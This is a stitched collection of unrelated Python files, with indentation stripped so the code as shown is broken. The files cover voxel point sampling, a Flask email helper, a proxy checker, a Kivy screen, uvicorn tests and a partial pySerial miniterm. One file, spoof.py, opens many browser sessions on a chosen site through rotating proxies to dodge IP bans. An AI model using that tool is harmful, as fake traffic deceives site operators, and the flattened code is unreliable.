temp_range = list(range(1,dim_voxel-1,4))+list(range(2,dim_voxel-1,4))+list(range(3,dim_voxel-1,4))+list(range(4,dim_voxel-1,4))
for j in temp_range:
if (batch_size_counter>=batch_size): break
for i in temp_range:
if (batch_size_counter>=batch_size): break
for k in temp_range:
if (batch_size_counter>=batch_size): break
if (np.max(voxel_model_temp[i-1:i+2,j-1:j+2,k-1:k+2])!=np.min(voxel_model_temp[i-1:i+2,j-1:j+2,k-1:k+2])):
si,sj,sk = sample_point_in_cube(voxel_model_256[i*multiplier:(i+1)*multiplier,j*multiplier:(j+1)*multiplier,k*multiplier:(k+1)*multiplier],voxel_model_temp[i,j,k],halfie)
sample_points[batch_size_counter,0] = si+i*multiplier
sample_points[batch_size_counter,1] = sj+j*multiplier
sample_points[batch_size_counter,2] = sk+k*multiplier
sample_values[batch_size_counter,0] = voxel_model_temp[i,j,k]
voxel_model_temp_flag[i,j,k] = 1
batch_size_counter +=1
if (batch_size_counter>=batch_size):
print("32-- batch_size exceeded!")
exceed_32_flag = 1
else:
exceed_32_flag = 0
#fill other slots with random points
while (batch_size_counter<batch_size):
while True:
i = random.randint(0,dim_voxel-1)
j = random.randint(0,dim_voxel-1)
k = random.randint(0,dim_voxel-1)
if voxel_model_temp_flag[i,j,k] != 1: break
si,sj,sk = sample_point_in_cube(voxel_model_256[i*multiplier:(i+1)*multiplier,j*multiplier:(j+1)*multiplier,k*multiplier:(k+1)*multiplier],voxel_model_temp[i,j,k],halfie)
sample_points[batch_size_counter,0] = si+i*multiplier
sample_points[batch_size_counter,1] = sj+j*multiplier
sample_points[batch_size_counter,2] = sk+k*multiplier
sample_values[batch_size_counter,0] = voxel_model_temp[i,j,k]
voxel_model_temp_flag[i,j,k] = 1
batch_size_counter +=1
sample_points_32 = sample_points
sample_values_32 = sample_values
#compress model 256 -> 16
dim_voxel = 16
voxel_model_temp = np.zeros([dim_voxel,dim_voxel,dim_voxel],np.uint8)
multiplier = int(256/dim_voxel)
halfie = int(multiplier/2)
for i in range(dim_voxel):
for j in range(dim_voxel):
for k in range(dim_voxel):
voxel_model_temp[i,j,k] = np.max(voxel_model_256[i*multiplier:(i+1)*multiplier,j*multiplier:(j+1)*multiplier,k*multiplier:(k+1)*multiplier])
#sample points near surface
batch_size = batch_size_1
sample_points = np.zeros([batch_size,3],np.uint8)
sample_values = np.zeros([batch_size,1],np.uint8)
batch_size_counter = 0
for i in range(dim_voxel):
for j in range(dim_voxel):
for k in range(dim_voxel):
si,sj,sk = sample_point_in_cube(voxel_model_256[i*multiplier:(i+1)*multiplier,j*multiplier:(j+1)*multiplier,k*multiplier:(k+1)*multiplier],voxel_model_temp[i,j,k],halfie)
sample_points[batch_size_counter,0] = si+i*multiplier
sample_points[batch_size_counter,1] = sj+j*multiplier
sample_points[batch_size_counter,2] = sk+k*multiplier
sample_values[batch_size_counter,0] = voxel_model_temp[i,j,k]
batch_size_counter +=1
if (batch_size_counter!=batch_size):
print("batch_size_counter!=batch_size")
sample_points_16 = sample_points
sample_values_16 = sample_values
q.put([name_list[idx][0],exceed_64_flag,exceed_32_flag,sample_points_64,sample_values_64,sample_points_32,sample_values_32,sample_points_16,sample_values_16,sample_voxels])
def list_image(root, exts):
image_list = []
cat = {}
for path, subdirs, files in os.walk(root):
for fname in files:
fpath = os.path.join(path, fname)
suffix = os.path.splitext(fname)[1].lower()
if os.path.isfile(fpath) and (suffix in exts):
if path not in cat:
cat[path] = len(cat)
image_list.append((os.path.relpath(fpath, root), cat[path]))
return image_list
if __name__ == '__main__':
print(class_name)
if not os.path.exists(class_name):
os.makedirs(class_name)
#dir of voxel models
voxel_input = "/local-scratch/zhiqinc/shapenet_hsp/modelBlockedVoxels256/"+class_name[:8]+"/"
#name of output file
hdf5_path = class_name+'/'+class_name[:8]+'_vox256.hdf5'
#obj_list
fout = open(class_name+'/'+class_name[:8]+'_vox256.txt','w',newline='')
#record statistics
fstatistics = open(class_name+'/statistics.txt','w',newline='')
exceed_32 = 0
exceed_64 = 0
image_list = list_image(voxel_input, ['.mat'])
name_list = []
for i in range(len(image_list)):
imagine=image_list[i][0]
name_list.append(imagine[0:-4])
name_list = sorted(name_list)
name_num = len(name_list)
for i in range(name_num):
fout.write(name_list[i]+"\n")
fout.close()
#prepare list of names
num_of_process = 12
list_of_list_of_names = []
for i in range(num_of_process):
list_of_names = []
for j in range(i,name_num,num_of_process):
list_of_names.append([j, voxel_input+name_list[j]+".mat"])
list_of_list_of_names.append(list_of_names)
#map processes
q = Queue()
workers = [Process(target=get_points_from_vox, args = (q, list_of_names)) for list_of_names in list_of_list_of_names]
for p in workers:
p.start()
#reduce process
hdf5_file = h5py.File(hdf5_path, 'w')
hdf5_file.create_dataset("voxels", [name_num,dim,dim,dim,1], np.uint8)
hdf5_file.create_dataset("points_16", [name_num,batch_size_1,3], np.uint8)
hdf5_file.create_dataset("values_16", [name_num,batch_size_1,1], np.uint8)
hdf5_file.create_dataset("points_32", [name_num,batch_size_2,3], np.uint8)
hdf5_file.create_dataset("values_32", [name_num,batch_size_2,1], np.uint8)
hdf5_file.create_dataset("points_64", [name_num,batch_size_3,3], np.uint8)
hdf5_file.create_dataset("values_64", [name_num,batch_size_3,1], np.uint8)
while True:
item_flag = True
try:
idx,exceed_64_flag,exceed_32_flag,sample_points_64,sample_values_64,sample_points_32,sample_values_32,sample_points_16,sample_values_16,sample_voxels = q.get(True, 1.0)
except queue.Empty:
item_flag = False
if item_flag:
#process result
exceed_32+=exceed_32_flag
exceed_64+=exceed_64_flag
hdf5_file["points_64"][idx,:,:] = sample_points_64
hdf5_file["values_64"][idx,:,:] = sample_values_64
hdf5_file["points_32"][idx,:,:] = sample_points_32
hdf5_file["values_32"][idx,:,:] = sample_values_32
hdf5_file["points_16"][idx,:,:] = sample_points_16
hdf5_file["values_16"][idx,:,:] = sample_values_16
hdf5_file["voxels"][idx,:,:,:,:] = sample_voxels
allExited = True
for p in workers:
if p.exitcode is None:
allExited = False
break
if allExited and q.empty():
break
fstatistics.write("total: "+str(name_num)+"\n")
fstatistics.write("exceed_32: "+str(exceed_32)+"\n")
fstatistics.write("exceed_32_ratio: "+str(float(exceed_32)/name_num)+"\n")
fstatistics.write("exceed_64: "+str(exceed_64)+"\n")
fstatistics.write("exceed_64_ratio: "+str(float(exceed_64)/name_num)+"\n")
fstatistics.close()
hdf5_file.close()
print("finished")
|
workerResultLog.py
|
# -*- coding: utf-8 -*-
from polylogyx.application import create_app
from polylogyx.settings import CurrentConfig
from polylogyx.tasks import analyse_result_log_data_with_rule_ioc_intel
import threading
app = create_app(config=CurrentConfig)
def match_with_rules():
while True:
print('executing and matching with rules...')
task=analyse_result_log_data_with_rule_ioc_intel.apply_async(queue='default_queue_tasks')
task.get()
print('execution finished...')
thread_count =1
for i in range(thread_count):
t = threading.Thread(target=match_with_rules)
t.start()
|
old_email.py
|
from flask_mail import Message
from app import app, mail
from threading import Thread
from flask import render_template
from flask_babel import _
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(subject, sender, recipients, text_body, html_body):
msg = Message(subject, sender=sender, recipients=recipients)
msg.body = text_body
msg.html = html_body
Thread(target=send_async_email, args=(app, msg)).start()
def send_password_reset_email(user):
token = user.get_reset_password_token()
send_email(_('[Microblog] Reset Your Password'),
sender=app.config['ADMINS'][0],
recipients=[user.email],
text_body=render_template('email/reset_password.txt',
user=user, token=token),
html_body=render_template('email/reset_password.html',
user=user, token=token))
|
try_proxies.py
|
"""爬代理"""
import os
import sys
sys.path.append(os.pardir)
import threading
from math import ceil
from lazy_spider.utils import get_sqlite_db
from lazy_spider.generic.proxy import *
def clear_proxies(checker: GenericProxyChecker, pool: SqliteProxyPool, proxies):
for proxy in proxies:
try:
r = checker.proxy_info(proxy)
if r == checker.CANT_TELNET:
print(f'cant telnet[{str(proxy)}]')
elif r == checker.CANT_PROXY:
print(f'\033[1;44;31mcant proxy[{str(proxy)}]\033[0m')
else:
print(f'\033[1;42;31m[{str(proxy)}]好耶\033[0m')
# del proxy
if r == checker.CANT_TELNET:
_, _, host, port = parse_proxy_url(list(proxy.values())[0])
del_cont = pool.del_proxy(str(host), int(port))
if not del_cont:
print('del_cont:', del_cont)
except Exception as e:
logger.exception(e)
def main():
checker = GenericProxyChecker(Apis('223.156.141.144'))
checker.set_sock_timeout(1)
pool = SqliteProxyPool(get_sqlite_db())
threading_counts = 40
check_counts = 800
proxies = pool.get_proxies(check_counts)
threads = []
partial = ceil(len(proxies) / threading_counts)
for i in range(0, len(proxies), partial):
temp = slice(i, i + partial)
each_process = proxies[temp]
print('thread start')
t = threading.Thread(target=clear_proxies, args=(checker, pool, each_process))
t.start()
threads.append(t)
for t in threads:
t.join()
if __name__ == '__main__':
exit(main())
|
offlinescreen.py
|
from kivy.uix.screenmanager import Screen
from ui.modals import GameModal
import threading
class OfflineScreen(Screen):
active_pop = None #active popup on the screen
def __init__(self,CApp,**kwargs):
super(OfflineScreen, self).__init__(**kwargs)
self.app = CApp
def training(self, *args):
self.offline_pop("Training")
caster = threading.Thread(target=self.app.game.training,args=[self],daemon=True)
caster.start()
def replays(self, *args):
self.offline_pop("Replay Theater")
caster = threading.Thread(target=self.app.game.replays,args=[self],daemon=True)
caster.start()
def local(self, *args):
self.offline_pop("Local VS")
caster = threading.Thread(target=self.app.game.local,args=[self],daemon=True)
caster.start()
def cpu(self, *args):
self.offline_pop("VS CPU")
caster = threading.Thread(target=self.app.game.cpu,args=[self],daemon=True)
caster.start()
def tournament(self, *args):
self.offline_pop("Tournament VS")
caster = threading.Thread(target=self.app.game.tournament,args=[self],daemon=True)
caster.start()
def standalone(self, *args):
self.offline_pop("Standalone")
caster = threading.Thread(target=self.app.game.standalone,args=[self],daemon=True)
caster.start()
def offline_pop(self, mode):
popup = GameModal()
popup.modal_txt.text = 'Starting %s mode...' % mode
popup.close_btn.text = "Stand by..."
popup.close_btn.disabled = True
popup.open()
self.app.offline_mode = mode
self.active_pop = popup
def error_message(self,e):
if self.active_pop != None:
self.active_pop.modal_txt.text = ""
for i in e:
self.active_pop.modal_txt.text += i + '\n'
self.active_pop.close_btn.disabled = False
self.active_pop.close_btn.bind(on_release=self.active_pop.dismiss)
self.active_pop.close_btn.text = "Close"
else:
popup = GameModal()
for i in e:
popup.modal_txt.text += i + '\n'
popup.close_btn.bind(on_release=popup.dismiss)
popup.close_btn.text = "Close"
popup.open()
|
spoof.py
|
from selenium import webdriver
from os import system
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.chrome.options import Options
import json, os, zipfile, threading, time
def threaded_spoof_not_auth(website,PROXY,path):
options = webdriver.ChromeOptions()
options.add_argument('--proxy-server=%s' % PROXY)
options.add_experimental_option('excludeSwitches', ['enable-logging'])
options.add_experimental_option("detach", True)
options.add_argument('window-size=760x980')
driver = webdriver.Chrome(options=options,executable_path=path)
try:
driver.get(website)
except:
input('\x1b[1;31mProxy Error')
def threaded_spoof_auth(PROXY_HOST, PROXY_PORT, PROXY_USER, PROXY_PASS, website):
manifest_json = """
{
"version": "1.0.0",
"manifest_version": 2,
"name": "Chrome Proxy",
"permissions": [
"proxy",
"tabs",
"unlimitedStorage",
"storage",
"<all_urls>",
"webRequest",
"webRequestBlocking"
],
"background": {
"scripts": ["background.js"]
},
"minimum_chrome_version":"22.0.0"
}
"""
background_js = """
var config = {
mode: "fixed_servers",
rules: {
singleProxy: {
scheme: "http",
host: "%s",
port: parseInt(%s)
},
bypassList: ["localhost"]
}
};
chrome.proxy.settings.set({value: config, scope: "regular"}, function() {});
function callbackFn(details) {
return {
authCredentials: {
username: "%s",
password: "%s"
}
};
}
chrome.webRequest.onAuthRequired.addListener(
callbackFn,
{urls: ["<all_urls>"]},
['blocking']
);
""" % (PROXY_HOST, PROXY_PORT, PROXY_USER, PROXY_PASS)
def get_chromedrivera(use_proxy=False, user_agent=None):
c = open('Settings.json')
data = json.load(c)
version = data['chromedriver_version']
chromedriverpath = f'chromedriver{version}.exe'
path = os.path.dirname(os.path.abspath(__file__))
options = webdriver.ChromeOptions()
if use_proxy:
#options.add_argument("--headless")
options.add_experimental_option('excludeSwitches', ['enable-logging'])
options.add_argument('window-size=760x980')
pluginfile = 'proxy_auth_plugin.zip'
with zipfile.ZipFile(pluginfile, 'w') as zp:
#options.add_argument("--headless")
options.add_experimental_option('excludeSwitches', ['enable-logging'])
options.add_argument('window-size=760x980')
zp.writestr("manifest.json", manifest_json)
zp.writestr("background.js", background_js)
options.add_extension(pluginfile)
if user_agent:
options.add_experimental_option('excludeSwitches', ['enable-logging'])
options.add_argument('window-size=760x980')
#options.add_argument("--headless")
options.add_argument('--user-agent=%s' % user_agent)
driver = webdriver.Chrome(executable_path=chromedriverpath,options=options)
return driver
def mainspoof():
driver = get_chromedrivera(use_proxy=True)
driver.get(website)
mainspoof()
def no_proxy(website,path):
startTime = time.time()
options = webdriver.ChromeOptions()
options.add_experimental_option('excludeSwitches', ['enable-logging'])
options.add_experimental_option("detach", True)
options.add_argument('window-size=760x980')
driver = webdriver.Chrome(options=options,executable_path=path)
driver.get(website)
def spoof_browser():
r = open("Settings.json")
ipproxies = json.load(r)
wait = ipproxies['Spoof-Task-Amount']
version = ipproxies['chromedriver_version']
chromedriverpath = f'chromedriver{version}.exe'
if os.path.getsize("BrowserSpooferProxies.txt") == 0:
I1 = input('There are no proxies loaded, do you want to go proxyless [y/n] ')
if I1 == 'y':
print('\x1b[1;31mWARNING, IF YOU GO PROXYLESS YOU HAVE A RISK OF GETTING YOUR IP BANNED!')
time.sleep(3)
website = input("\x1b[1;36mWhich Website Do You Want To Spoof?\x1b[1;37m: ")
waittime = int(wait)* 4
main_wait_time = waittime / 10
print('\x1b[1;36mEstimated Load Time\x1b[1;37m: {}s'.format(main_wait_time))
for y in range(int(wait)):
thread = threading.Thread(target=no_proxy, args=(website,chromedriverpath,))
thread.start()
S4 = input("\x1b[1;36m CLICK \x1b[1;37m'\x1b[1;36mENTER\x1b[1;37m' \x1b[1;36mWHEN YOU ARE DONE\x1b[1;37m: ")
elif I1 == 'n':
print('Add proxies!')
time.sleep(1)
spoof_browser()
else:
website = input("\x1b[1;36mWhich Website Do You Want To Spoof?\x1b[1;37m: ")
proxies = open('BrowserSpooferProxies.txt','r')
for y in range(int(wait)):
line = proxies.readline()[:-1]
if len(line.split(':'))==4:
PROXY_HOST = (line.split(':')[0])
PROXY_PORT = (line.split(':')[1])
PROXY_USER = (line.split(':')[2])
PROXY_PASS = (line.split(':')[3])
waittime = int(wait)* 4
main_wait_time = waittime / 10
print('\x1b[1;36mEstimated Load Time\x1b[1;37m: {}s'.format(main_wait_time))
thread = threading.Thread(target=threaded_spoof_auth, args=(PROXY_HOST, PROXY_PORT, PROXY_USER, PROXY_PASS,website,))
thread.start()
else:
startTime = time.time()
ip = (line.split(':')[0])
port = (line.split(':')[1])
PROXY = ip+":"+port
waittime = int(wait)* 4
main_wait_time = waittime / 10
print('\x1b[1;36mEstimated Load Time\x1b[1;37m: {}s'.format(main_wait_time))
thread = threading.Thread(target=threaded_spoof_not_auth, args=(website,PROXY))
thread.start()
S4 = input("\x1b[1;36m CLICK \x1b[1;37m'\x1b[1;36mENTER\x1b[1;37m' \x1b[1;36mWHEN YOU ARE DONE\x1b[1;37m: ")
try:
os.system('cls')
spoof_browser()
except Exception as ex:
print(ex)
|
test_main.py
|
import asyncio
import threading
import time
import pytest
import requests
from uvicorn.config import Config
from uvicorn.main import Server
async def app(scope, receive, send):
assert scope["type"] == "http"
await send({"type": "http.response.start", "status": 204, "headers": []})
await send({"type": "http.response.body", "body": b"", "more_body": False})
@pytest.mark.parametrize(
"host, url",
[
pytest.param(None, "http://127.0.0.1:8000", id="default"),
pytest.param("localhost", "http://127.0.0.1:8000", id="hostname"),
pytest.param("::1", "http://[::1]:8000", id="ipv6"),
],
)
def test_run(host, url):
config = Config(app=app, host=host, loop="asyncio", limit_max_requests=1)
server = Server(config=config)
thread = threading.Thread(target=server.run)
thread.start()
while not server.started:
time.sleep(0.01)
response = requests.get(url)
assert response.status_code == 204
thread.join()
def test_run_multiprocess():
config = Config(app=app, loop="asyncio", workers=2, limit_max_requests=1)
server = Server(config=config)
thread = threading.Thread(target=server.run)
thread.start()
while not server.started:
time.sleep(0.01)
response = requests.get("http://127.0.0.1:8000")
assert response.status_code == 204
thread.join()
def test_run_reload():
config = Config(app=app, loop="asyncio", reload=True, limit_max_requests=1)
server = Server(config=config)
thread = threading.Thread(target=server.run)
thread.start()
while not server.started:
time.sleep(0.01)
response = requests.get("http://127.0.0.1:8000")
assert response.status_code == 204
thread.join()
def test_run_with_shutdown():
async def app(scope, receive, send):
assert scope["type"] == "http"
while True:
time.sleep(1)
config = Config(app=app, loop="asyncio", workers=2, limit_max_requests=1)
server = Server(config=config)
sock = config.bind_socket()
exc = True
def safe_run():
nonlocal exc, server
try:
exc = None
config.setup_event_loop()
loop = asyncio.get_event_loop()
loop.run_until_complete(server.serve(sockets=[sock]))
except Exception as e:
exc = e
thread = threading.Thread(target=safe_run)
thread.start()
while not server.started:
time.sleep(0.01)
server.should_exit = True
thread.join()
assert exc is None
|
miniterm.py
|
#!/home/pi/Adafruit_CircuitPython_ServoKit/envSERVOKIT/bin/python3
#
# Very simple serial terminal
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
import codecs
import os
import sys
import threading
import serial
from serial.tools.list_ports import comports
from serial.tools import hexlify_codec
# pylint: disable=wrong-import-order,wrong-import-position
codecs.register(lambda c: hexlify_codec.getregentry() if c == 'hexlify' else None)
try:
raw_input
except NameError:
# pylint: disable=redefined-builtin,invalid-name
raw_input = input # in python3 it's "raw"
unichr = chr
def key_description(character):
"""generate a readable description for a key"""
ascii_code = ord(character)
if ascii_code < 32:
return 'Ctrl+{:c}'.format(ord('@') + ascii_code)
else:
return repr(character)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class ConsoleBase(object):
"""OS abstraction for console (input/output codec, no echo)"""
def __init__(self):
if sys.version_info >= (3, 0):
self.byte_output = sys.stdout.buffer
else:
self.byte_output = sys.stdout
self.output = sys.stdout
def setup(self):
"""Set console to read single characters, no echo"""
def cleanup(self):
"""Restore default console settings"""
def getkey(self):
"""Read a single key from the console"""
return None
def write_bytes(self, byte_string):
"""Write bytes (already encoded)"""
self.byte_output.write(byte_string)
self.byte_output.flush()
def write(self, text):
"""Write string"""
self.output.write(text)
self.output.flush()
def cancel(self):
"""Cancel getkey operation"""
# - - - - - - - - - - - - - - - - - - - - - - - -
# context manager:
# switch terminal temporary to normal mode (e.g. to get user input)
def __enter__(self):
self.cleanup()
return self
def __exit__(self, *args, **kwargs):
self.setup()
if os.name == 'nt': # noqa
import msvcrt
import ctypes
class Out(object):
"""file-like wrapper that uses os.write"""
def __init__(self, fd):
self.fd = fd
def flush(self):
pass
def write(self, s):
os.write(self.fd, s)
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self._saved_ocp = ctypes.windll.kernel32.GetConsoleOutputCP()
self._saved_icp = ctypes.windll.kernel32.GetConsoleCP()
ctypes.windll.kernel32.SetConsoleOutputCP(65001)
ctypes.windll.kernel32.SetConsoleCP(65001)
self.output = codecs.getwriter('UTF-8')(Out(sys.stdout.fileno()), 'replace')
# the change of the code page is not propagated to Python, manually fix it
sys.stderr = codecs.getwriter('UTF-8')(Out(sys.stderr.fileno()), 'replace')
sys.stdout = self.output
self.output.encoding = 'UTF-8' # needed for input
def __del__(self):
ctypes.windll.kernel32.SetConsoleOutputCP(self._saved_ocp)
ctypes.windll.kernel32.SetConsoleCP(self._saved_icp)
def getkey(self):
while True:
z = msvcrt.getwch()
if z == unichr(13):
return unichr(10)
elif z in (unichr(0), unichr(0x0e)): # functions keys, ignore
msvcrt.getwch()
else:
return z
def cancel(self):
# CancelIo, CancelSynchronousIo do not seem to work when using
# getwch, so instead, send a key to the window with the console
hwnd = ctypes.windll.kernel32.GetConsoleWindow()
ctypes.windll.user32.PostMessageA(hwnd, 0x100, 0x0d, 0)
elif os.name == 'posix':
import atexit
import termios
import fcntl
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self.fd = sys.stdin.fileno()
self.old = termios.tcgetattr(self.fd)
atexit.register(self.cleanup)
if sys.version_info < (3, 0):
self.enc_stdin = codecs.getreader(sys.stdin.encoding)(sys.stdin)
else:
self.enc_stdin = sys.stdin
def setup(self):
new = termios.tcgetattr(self.fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, new)
def getkey(self):
c = self.enc_stdin.read(1)
if c == unichr(0x7f):
c = unichr(8) # map the BS key (which yields DEL) to backspace
return c
def cancel(self):
fcntl.ioctl(self.fd, termios.TIOCSTI, b'\0')
def cleanup(self):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
else:
raise NotImplementedError(
'Sorry no implementation for your platform ({}) available.'.format(sys.platform))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class Transform(object):
"""do-nothing: forward all data unchanged"""
def rx(self, text):
"""text received from serial port"""
return text
def tx(self, text):
"""text to be sent to serial port"""
return text
def echo(self, text):
"""text to be sent but displayed on console"""
return text
class CRLF(Transform):
"""ENTER sends CR+LF"""
def tx(self, text):
return text.replace('\n', '\r\n')
class CR(Transform):
"""ENTER sends CR"""
def rx(self, text):
return text.replace('\r', '\n')
def tx(self, text):
return text.replace('\n', '\r')
class LF(Transform):
"""ENTER sends LF"""
class NoTerminal(Transform):
"""remove typical terminal control codes from input"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32) if unichr(x) not in '\r\n\b\t')
REPLACEMENT_MAP.update(
{
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
def rx(self, text):
return text.translate(self.REPLACEMENT_MAP)
echo = rx
class NoControls(NoTerminal):
"""Remove all control codes, incl. CR+LF"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32))
REPLACEMENT_MAP.update(
{
0x20: 0x2423, # visual space
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
class Printable(Transform):
"""Show decimal code for all non-ASCII characters and replace most control codes"""
def rx(self, text):
r = []
for c in text:
if ' ' <= c < '\x7f' or c in '\r\n\b\t':
r.append(c)
elif c < ' ':
r.append(unichr(0x2400 + ord(c)))
else:
r.extend(unichr(0x2080 + ord(d) - 48) for d in '{:d}'.format(ord(c)))
r.append(' ')
return ''.join(r)
echo = rx
class Colorize(Transform):
"""Apply different colors for received and echo"""
def __init__(self):
# XXX make it configurable, use colorama?
self.input_color = '\x1b[37m'
self.echo_color = '\x1b[31m'
def rx(self, text):
return self.input_color + text
def echo(self, text):
return self.echo_color + text
class DebugIO(Transform):
"""Print what is sent and received"""
def rx(self, text):
sys.stderr.write(' [RX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
def tx(self, text):
sys.stderr.write(' [TX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
# other ideas:
# - add date/time for each newline
# - insert newline after: a) timeout b) packet end character
EOL_TRANSFORMATIONS = {
'crlf': CRLF,
'cr': CR,
'lf': LF,
}
TRANSFORMATIONS = {
'direct': Transform, # no transformation
'default': NoTerminal,
'nocontrol': NoControls,
'printable': Printable,
'colorize': Colorize,
'debug': DebugIO,
}
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def ask_for_port():
"""\
Show a list of ports and ask the user for a choice. To make selection
easier on systems with long device names, also allow the input of an
index.
"""
sys.stderr.write('\n--- Available ports:\n')
ports = []
for n, (port, desc, hwid) in enumerate(sorted(comports()), 1):
sys.stderr.write('--- {:2}: {:20} {!r}\n'.format(n, port, desc))
ports.append(port)
while True:
port = raw_input('--- Enter port index or full name: ')
try:
index = int(port) - 1
if not 0 <= index < len(ports):
sys.stderr.write('--- Invalid index!\n')
continue
except ValueError:
pass
else:
port = ports[index]
return port
class Miniterm(object):
"""\
Terminal application. Copy data from serial port to console and vice versa.
Handle special keys from the console to show menu etc.
"""
def __init__(self, serial_instance, echo=False, eol='crlf', filters=()):
self.console = Console()
self.serial = serial_instance
self.echo = echo
self.raw = False
self.input_encoding = 'UTF-8'
self.output_encoding = 'UTF-8'
self.eol = eol
self.filters = filters
self.update_transformations()
self.exit_character = 0x1d # GS/CTRL+]
self.menu_character = 0x14 # Menu: CTRL+T
self.alive = None
self._reader_alive = None
self.receiver_thread = None
self.rx_decoder = None
self.tx_decoder = None
def _start_reader(self):
"""Start reader thread"""
self._reader_alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader, name='rx')
self.receiver_thread.daemon = True
self.receiver_thread.start()
def _stop_reader(self):
"""Stop reader thread only, wait for clean exit of thread"""
self._reader_alive = False
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def start(self):
"""start worker threads"""
self.alive = True
self._start_reader()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer, name='tx')
self.transmitter_thread.daemon = True
self.transmitter_thread.start()
self.console.setup()
def stop(self):
"""set flag to stop worker threads"""
self.alive = False
def join(self, transmit_only=False):
"""wait for worker threads to terminate"""
self.transmitter_thread.join()
if not transmit_only:
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def close(self):
self.serial.close()
def update_transformations(self):
"""take list of transformation classes and instantiate them for rx and tx"""
transformations = [EOL_TRANSFORMATIONS[self.eol]] + [TRANSFORMATIONS[f]
for f in self.filters]
self.tx_transformations = [t() for t in transformations]
self.rx_transformations = list(reversed(self.tx_transformations))
def set_rx_encoding(self, encoding, errors='replace'):
"""set encoding for received data"""
self.input_encoding = encoding
self.rx_decoder = codecs.getincrementaldecoder(encoding)(errors)
def set_tx_encoding(self, encoding, errors='replace'):
"""set encoding for transmitted data"""
self.output_encoding = encoding
self.tx_encoder = codecs.getincrementalencoder(encoding)(errors)
def dump_port_settings(self):
"""Write current settings to sys.stderr"""
sys.stderr.write("\n--- Settings: {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits}\n".format(
p=self.serial))
sys.stderr.write('--- RTS: {:8} DTR: {:8} BREAK: {:8}\n'.format(
('active' if self.serial.rts else 'inactive'),
('active' if self.serial.dtr else 'inactive'),
('active' if self.serial.break_condition else 'inactive')))
try:
sys.stderr.write('--- CTS: {:8} DSR: {:8} RI: {:8} CD: {:8}\n'.format(
('active' if self.serial.cts else 'inactive'),
('active' if self.serial.dsr else 'inactive'),
('active' if self.serial.ri else 'inactive'),
('active' if self.serial.cd else 'inactive')))
except serial.SerialException:
# on RFC 2217 ports, it can happen if no modem state notification was
# yet received. ignore this error.
pass
sys.stderr.write('--- software flow control: {}\n'.format('active' if self.serial.xonxoff else 'inactive'))
sys.stderr.write('--- hardware flow control: {}\n'.format('active' if self.serial.rtscts else 'inactive'))
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
sys.stderr.write('--- EOL: {}\n'.format(self.eol.upper()))
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def reader(self):
"""loop and copy serial->console"""
try:
while self.alive and self._reader_alive:
# read all that is there or wait for one byte
data = self.serial.read(self.serial.in_waiting or 1)
if data:
if self.raw:
self.console.write_bytes(data)
else:
text = self.rx_decoder.decode(data)
for transformation in self.rx_transformations:
text = transformation.rx(text)
self.console.write(text)
except serial.SerialException:
self.alive = False
self.console.cancel()
raise # XXX handle instead of re-raise?
def writer(self):
"""\
Loop and copy console->serial until self.exit_character character is
found. When self.menu_character is found, interpret the next key
locally.
"""
menu_active = False
try:
while self.alive:
try:
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if not self.alive:
break
if menu_active:
self.handle_menu_key(c)
menu_active = False
elif c == self.menu_character:
menu_active = True # next char will be for menu
elif c == self.exit_character:
self.stop() # exit app
break
else:
#~ if self.raw:
text = c
for transformation in self.tx_transformations:
text = transformation.tx(text)
self.serial.write(self.tx_encoder.encode(text))
if self.echo:
echo_text = c
for transformation in self.tx_transformations:
echo_text = transformation.echo(echo_text)
self.console.write(echo_text)
except:
self.alive = False
raise
def handle_menu_key(self, c):
"""Implement a simple menu / settings"""
if c == self.menu_character or c == self.exit_character:
# Menu/exit character again -> send itself
self.serial.write(self.tx_encoder.encode(c))
if self.echo:
self.console.write(c)
elif c == '\x15': # CTRL+U -> upload file
self.upload_file()
elif c in '\x08hH?': # CTRL+H, h, H, ? -> Show help
sys.stderr.write(self.get_help_text())
elif c == '\x12': # CTRL+R -> Toggle RTS
self.serial.rts = not self.serial.rts
sys.stderr.write('--- RTS {} ---\n'.format('active' if self.serial.rts else 'inactive'))
elif c == '\x04': # CTRL+D -> Toggle DTR
self.serial.dtr = not self.serial.dtr
sys.stderr.write('--- DTR {} ---\n'.format('active' if self.serial.dtr else 'inactive'))
elif c == '\x02': # CTRL+B -> toggle BREAK condition
self.serial.break_condition = not self.serial.break_condition
sys.stderr.write('--- BREAK {} ---\n'.format('active' if self.serial.break_condition else 'inactive'))
elif c == '\x05': # CTRL+E -> toggle local echo
self.echo = not self.echo
sys.stderr.write('--- local echo {} ---\n'.format('active' if self.echo else 'inactive'))
elif c == '\x06': # CTRL+F -> edit filters
self.change_filter()
elif c == '\x0c': # CTRL+L -> EOL mode
modes = list(EOL_TRANSFORMATIONS) # keys
eol = modes.index(self.eol) + 1
if eol >= len(modes):
eol = 0
self.eol = modes[eol]
